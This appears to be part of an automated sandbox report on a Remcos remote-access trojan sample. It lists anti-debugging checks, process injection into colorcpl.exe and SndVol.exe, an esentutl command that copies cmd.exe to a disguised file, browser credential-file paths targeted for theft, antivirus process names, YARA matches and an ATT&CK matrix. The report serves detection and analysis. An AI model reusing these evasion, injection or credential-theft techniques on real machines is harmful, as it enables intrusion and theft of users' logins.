                    Source: XjPA2pnUhC.exe, 00000000.00000002.2116974207.00000000005F0000.00000004.00000020.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2116974207.0000000000608000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000002.4510209869.00000000007AA000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000003.2139804062.00000000007AA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                    Source: Qzzgbhha.PIF, 00000009.00000002.2229660285.0000000000791000.00000004.00000020.00020000.00000000.sdmp, Qzzgbhha.PIF, 0000000B.00000002.2306738847.0000000000696000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exe | API call chain: ExitProcess graph end node graph_0-77458
                    Source: C:\Windows\SysWOW64\colorcpl.exe | API call chain: ExitProcess graph end node graph_7-48754
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIF | API call chain: ExitProcess graph end node

                    Anti Debugging

                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exe | Code function: 0_2_0290F744 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,0_2_0290F744
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exe | Process queried: DebugPort
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIF | Process queried: DebugPort
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIF | Process queried: DebugPort
                    Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_02FC4A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_02FC4A8A
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exe | Code function: 0_2_0290894C LoadLibraryW,GetProcAddress,FreeLibrary,0_2_0290894C
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exe | Code function: 0_2_029BA8E5 mov eax, dword ptr fs:[00000030h] 0_2_029BA8E5
                    Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_02FD3355 mov eax, dword ptr fs:[00000030h] 7_2_02FD3355
                    Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 10_2_028C3355 mov eax, dword ptr fs:[00000030h] 10_2_028C3355
                    Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 12_2_03043355 mov eax, dword ptr fs:[00000030h] 12_2_03043355
                    Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_02FA20B2 GetProcessHeap,HeapFree,7_2_02FA20B2
                    Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_02FC503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_02FC503C
                    Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_02FC4A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_02FC4A8A
                    Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_02FC4BD8 SetUnhandledExceptionFilter,7_2_02FC4BD8
                    Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_02FCBB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_02FCBB71
                    Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 10_2_028B503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_028B503C
                    Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 10_2_028B4A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_028B4A8A
                    Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 10_2_028B4BD8 SetUnhandledExceptionFilter,10_2_028B4BD8
                    Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 10_2_028BBB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_028BBB71
                    Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 12_2_0303503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_0303503C
                    Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 12_2_0303BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_0303BB71
                    Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 12_2_03034BD8 SetUnhandledExceptionFilter,12_2_03034BD8
                    Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 12_2_03034A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_03034A8A

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIF | Process created / APC Queued / Resumed: C:\Windows\SysWOW64\SndVol.exe
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIF | Process created / APC Queued / Resumed: C:\Windows\SysWOW64\SndVol.exe
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exe | Process created / APC Queued / Resumed: C:\Windows\SysWOW64\colorcpl.exe
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exe | Memory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 2F90000 protect: page execute and read and write
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIF | Memory allocated: C:\Windows\SysWOW64\SndVol.exe base: 2880000 protect: page execute and read and write
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIF | Memory allocated: C:\Windows\SysWOW64\SndVol.exe base: 3000000 protect: page execute and read and write
                    Source: C:\Windows\SysWOW64\esentutl.exe | File created: C:\Users\Public\alpha.pif
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exe | Thread APC queued: target process: C:\Windows\SysWOW64\colorcpl.exe
                    Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 7_2_02FA2132
                    Source: C:\Windows\SysWOW64\SndVol.exe | Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 10_2_02892132
                    Source: C:\Windows\SysWOW64\SndVol.exe | Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 12_2_03012132
                    Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_02FA9662 mouse_event,7_2_02FA9662
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exe | Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIF | Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIF | Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
                    Source: colorcpl.exe, 00000007.00000002.4510115069.0000000000768000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managerf
                    Source: colorcpl.exe, 00000007.00000002.4510115069.0000000000768000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managerc
                    Source: colorcpl.exe, 00000007.00000002.4510115069.0000000000791000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerHJ\
                    Source: colorcpl.exe, 00000007.00000002.4510115069.0000000000791000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managerr|
                    Source: colorcpl.exe, 00000007.00000002.4510115069.0000000000768000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manageri
                    Source: colorcpl.exe, 00000007.00000002.4510115069.0000000000768000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerJ
                    Source: colorcpl.exe, 00000007.00000002.4510115069.0000000000728000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagersInfo/s
                    Source: colorcpl.exe, 00000007.00000002.4510115069.0000000000768000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerW
                    Source: colorcpl.exe, 00000007.00000002.4510115069.0000000000791000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerHJ\30
                    Source: colorcpl.exe, 00000007.00000002.4510115069.0000000000791000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managert
                    Source: colorcpl.exe, 00000007.00000002.4510115069.0000000000768000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managerr
                    Source: colorcpl.exe, 00000007.00000002.4510115069.0000000000791000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000002.4510115069.0000000000788000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: |Program Manager|
                    Source: colorcpl.exe, 00000007.00000002.4510115069.0000000000791000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerHJ\b
                    Source: colorcpl.exe, 00000007.00000003.2139804062.000000000079E000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000002.4510209869.000000000079E000.00000004.00000020.00020000.00000000.sdmp, logs.dat.7.dr | Binary or memory string: [Program Manager]
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exe | Code function: 0_2_029AC246 cpuid 0_2_029AC246
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exe | Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_028F5ACC
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exe | Code function: GetLocaleInfoA,0_2_028FA7C4
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exe | Code function: GetLocaleInfoA,0_2_028FA810
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exe | Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_028F5BD8
                    Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: GetLocaleInfoA,7_2_02F9F90C
                    Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: GetLocaleInfoW,7_2_02FE2393
                    Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: EnumSystemLocalesW,7_2_02FE20B6
                    Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: EnumSystemLocalesW,7_2_02FE201B
                    Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,7_2_02FE2143
                    Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,7_2_02FE2690
                    Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,7_2_02FE24BC
                    Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: EnumSystemLocalesW,7_2_02FD8484
                    Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: GetLocaleInfoW,7_2_02FE25C3
                    Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: GetLocaleInfoW,7_2_02FD896D
                    Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: EnumSystemLocalesW,7_2_02FE1FD0
                    Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,7_2_02FE1D58
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIF | Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,9_2_028B5ACC
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIF | Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,9_2_028B5BD7
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIF | Code function: GetLocaleInfoA,9_2_028BA810
                    Source: C:\Windows\SysWOW64\SndVol.exe | Code function: GetLocaleInfoW,10_2_028D2393
                    Source: C:\Windows\SysWOW64\SndVol.exe | Code function: EnumSystemLocalesW,10_2_028D20B6
                    Source: C:\Windows\SysWOW64\SndVol.exe | Code function: EnumSystemLocalesW,10_2_028D201B
                    Source: C:\Windows\SysWOW64\SndVol.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,10_2_028D2143
                    Source: C:\Windows\SysWOW64\SndVol.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,10_2_028D2690
                    Source: C:\Windows\SysWOW64\SndVol.exe | Code function: EnumSystemLocalesW,10_2_028C8484
                    Source: C:\Windows\SysWOW64\SndVol.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,10_2_028D24BC
                    Source: C:\Windows\SysWOW64\SndVol.exe | Code function: GetLocaleInfoW,10_2_028D25C3
                    Source: C:\Windows\SysWOW64\SndVol.exe | Code function: GetLocaleInfoA,10_2_0288F90C
                    Source: C:\Windows\SysWOW64\SndVol.exe | Code function: GetLocaleInfoW,10_2_028C896D
                    Source: C:\Windows\SysWOW64\SndVol.exe | Code function: EnumSystemLocalesW,10_2_028D1FD0
                    Source: C:\Windows\SysWOW64\SndVol.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,10_2_028D1D58
                    Source: C:\Windows\SysWOW64\SndVol.exe | Code function: GetLocaleInfoW,12_2_03052393
                    Source: C:\Windows\SysWOW64\SndVol.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,12_2_03052143
                    Source: C:\Windows\SysWOW64\SndVol.exe | Code function: EnumSystemLocalesW,12_2_0305201B
                    Source: C:\Windows\SysWOW64\SndVol.exe | Code function: EnumSystemLocalesW,12_2_030520B6
                    Source: C:\Windows\SysWOW64\SndVol.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,12_2_03052690
                    Source: C:\Windows\SysWOW64\SndVol.exe | Code function: GetLocaleInfoW,12_2_030525C3
                    Source: C:\Windows\SysWOW64\SndVol.exe | Code function: EnumSystemLocalesW,12_2_03048484
                    Source: C:\Windows\SysWOW64\SndVol.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,12_2_030524BC
                    Source: C:\Windows\SysWOW64\SndVol.exe | Code function: GetLocaleInfoA,12_2_0300F90C
                    Source: C:\Windows\SysWOW64\SndVol.exe | Code function: GetLocaleInfoW,12_2_0304896D
                    Source: C:\Windows\SysWOW64\SndVol.exe | Code function: EnumSystemLocalesW,12_2_03051FD0
                    Source: C:\Windows\SysWOW64\SndVol.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,12_2_03051D58
                    Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exe | Code function: 0_2_028F920C GetLocalTime,0_2_028F920C
                    Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_02FAB69E GetComputerNameExW,GetUserNameW,7_2_02FAB69E
                    Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_02FD9210 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,7_2_02FD9210
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exe | Code function: 0_2_028FB78C GetVersionExA,0_2_028FB78C
                    Source: C:\Windows\SysWOW64\colorcpl.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                    Source: XjPA2pnUhC.exe, 00000000.00000003.2080428104.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2080667872.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2130094884.000000007F340000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: cmdagent.exe
                    Source: XjPA2pnUhC.exe, 00000000.00000003.2080428104.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2080667872.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2130094884.000000007F340000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: quhlpsvc.exe
                    Source: XjPA2pnUhC.exe, 00000000.00000003.2080428104.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2080667872.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2130094884.000000007F340000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: avgamsvr.exe
                    Source: XjPA2pnUhC.exe, 00000000.00000003.2080428104.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2080667872.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2130094884.000000007F340000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: TMBMSRV.exe
                    Source: XjPA2pnUhC.exe, 00000000.00000003.2080428104.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2080667872.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2130094884.000000007F340000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: Vsserv.exe
                    Source: XjPA2pnUhC.exe, 00000000.00000003.2080428104.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2080667872.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2130094884.000000007F340000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: avgupsvc.exe
                    Source: XjPA2pnUhC.exe, 00000000.00000003.2080428104.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2080667872.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2130094884.000000007F340000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: avgemc.exe
                    Source: XjPA2pnUhC.exe, 00000000.00000003.2080428104.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2080667872.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2130094884.000000007F340000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: MsMpEng.exe

                    Stealing of Sensitive Information

Source: Yara match | File source: 10.2.SndVol.exe.2880000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.SndVol.exe.2880000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.colorcpl.exe.2f90000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.colorcpl.exe.2f90000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.SndVol.exe.3000000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.SndVol.exe.3000000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.XjPA2pnUhC.exe.28f0000.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.4510115069.0000000000791000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.4510318610.0000000000CFF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.4510115069.0000000000728000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.2251996048.000000001F0E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.2306880653.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.2228243300.0000000002880000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.2330151215.000000002B797000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2129313765.000000007E9D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: XjPA2pnUhC.exe PID: 2780, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: colorcpl.exe PID: 2684, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: SndVol.exe PID: 1520, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: SndVol.exe PID: 1200, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data, 7_2_02F9BA4D
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data, 10_2_0288BA4D
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data, 12_2_0300BA4D
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\, 7_2_02F9BB6B
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: \key3.db, 7_2_02F9BB6B
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\, 10_2_0288BB6B
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: \key3.db, 10_2_0288BB6B
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\, 12_2_0300BB6B
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: \key3.db, 12_2_0300BB6B

                    Remote Access Functionality

Source: C:\Windows\SysWOW64\colorcpl.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-OGO4HJ
Source: C:\Windows\SysWOW64\SndVol.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-OGO4HJ
Source: C:\Windows\SysWOW64\SndVol.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-OGO4HJ
Source: Yara match | File source: 10.2.SndVol.exe.2880000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.SndVol.exe.2880000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.colorcpl.exe.2f90000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.colorcpl.exe.2f90000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.SndVol.exe.3000000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.SndVol.exe.3000000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.XjPA2pnUhC.exe.28f0000.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.4510115069.0000000000791000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.4510318610.0000000000CFF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.4510115069.0000000000728000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.2251996048.000000001F0E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.2306880653.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.2228243300.0000000002880000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.2330151215.000000002B797000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2129313765.000000007E9D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: XjPA2pnUhC.exe PID: 2780, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: colorcpl.exe PID: 2684, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: SndVol.exe PID: 1520, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: SndVol.exe PID: 1200, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: cmd.exe, 7_2_02F9569A
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: cmd.exe, 10_2_0288569A
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: cmd.exe, 12_2_0300569A
MITRE ATT&CK Matrix

The matrix is listed per tactic column. A number in front of a technique is the count the report shows for that technique; techniques without a number carry no count in the report.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances

Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains

Initial Access: 1 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools

Execution: 1 Native API; 1 Command and Scripting Interpreter; 2 Service Execution; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript

Persistence: 1 DLL Side-Loading; 1 Valid Accounts; 1 Windows Service; 1 Registry Run Keys / Startup Folder; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd

Privilege Escalation: 1 DLL Side-Loading; 1 Bypass User Account Control; 1 Valid Accounts; 11 Access Token Manipulation; 1 Windows Service; 322 Process Injection; 1 Registry Run Keys / Startup Folder; Scheduled Task/Job; At; Cron; Launchd

Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 1 Timestomp; 1 DLL Side-Loading; 1 Bypass User Account Control; 211 Masquerading; 1 Valid Accounts; 2 Virtualization/Sandbox Evasion; 11 Access Token Manipulation; 322 Process Injection

Credential Access: 1 OS Credential Dumping; 211 Input Capture; 2 Credentials In Files; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture

Discovery: 2 System Time Discovery; 1 Account Discovery; 1 System Service Discovery; 1 System Network Connections Discovery; 2 File and Directory Discovery; 45 System Information Discovery; 241 Security Software Discovery; 2 Virtualization/Sandbox Evasion; 2 Process Discovery; 1 Application Window Discovery; 1 System Owner/User Discovery

Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools

Collection: 11 Archive Collected Data; 211 Input Capture; 3 Clipboard Data; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging

Command and Control: 12 Ingress Tool Transfer; 21 Encrypted Channel; 1 Remote Access Software; 2 Non-Application Layer Protocol; 213 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols

Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol

Impact: 1 System Shutdown/Reboot; 1 Defacement; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption
Behavior Graph (text rendering of the graph)

Behavior Graph ID: 1517948 | Sample: XjPA2pnUhC.exe | Start date: 25/09/2024 | Architecture: WINDOWS | Score: 100

Start (node 2)
